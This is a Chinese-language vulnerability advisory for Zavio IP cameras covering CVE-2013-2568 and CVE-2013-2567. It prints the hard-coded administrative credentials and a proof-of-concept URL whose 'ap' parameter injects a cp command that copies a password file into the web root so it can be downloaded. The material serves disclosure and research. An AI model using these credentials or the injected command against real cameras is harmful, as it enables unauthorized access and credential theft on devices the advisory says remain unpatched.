Zavio IP Cameras 任意命令注入漏洞(CVE-2013-2568)


发布日期:2013-05-28
更新日期:2013-05-29

受影响系统:
Zavio Zavio IP Cameras <= 1.6.03
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 60190
 CVE(CAN) ID: CVE-2013-2568
 
Zavio IP Cameras是网络摄像机产品。
 
Zavio IP Cameras在文件'/cgi-bin/mft/wireless_mft.cgi'的参数'ap'中存在OS命令注入,通过硬编码凭证可导致OS命令注入。
 
<*来源:Nahuel Riva
        Francisco Falcon
 
  链接:http://www.gossamer-threads.com/lists/fulldisc/full-disclosure/89865?page=last
 *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
摘录自
 http://www.coresecurity.com/advisories/zavio-IP-cameras-multiple-vulnerabilities
 
[CVE-2013-2567] 硬编码的可访问管理界面的用户名和密码
 

配置文件'boa.conf'中含有硬编码的用户名和密码,可通过该用户名和密码访问'/cgi-bin/mft/'的CGI文件('manufacture.cgi'和'wireless_mft.cgi')。
 其中'wireless_mft.cgi'包含一个命令注入漏洞(CVE-2013-2568)
 
/-----
# MFT: Specify manufacture commands user name and password
MFT manufacture erutcafunam
-----/


[CVE-2013-2568] 命令注入漏洞
 

'/cgi-bin/mft/wireless_mft.cgi'对'ap'参数验证不严而导致命令注入漏洞。
 
下面poc演示如何获取用户的凭证信息
 
step1. 使用前述硬编码的用户名(manufacture)和密码(erutcafunam)访问'/cgi-bin/mft/wireless_mft.cgi';
 stpe2. 构造恶意'ap'参数值来执行cp命令,拷贝私密文件;
 step3. 访问私密文件.
 
step2.
 /-----
http://192.168.1.100/cgi-bin/mft/wireless_mft?ap=travesti;cp%20/var/www/secret.passwd%20/web/html/credenciales
-----/

step3.
Afterwards, the user credentials can be obtained by requesting:
/-----
http://192.168.1.100/credenciales
-----/

建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Zavio
 -----
 目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
 
http://www.zavio.com/

相关内容

    暂无相关文章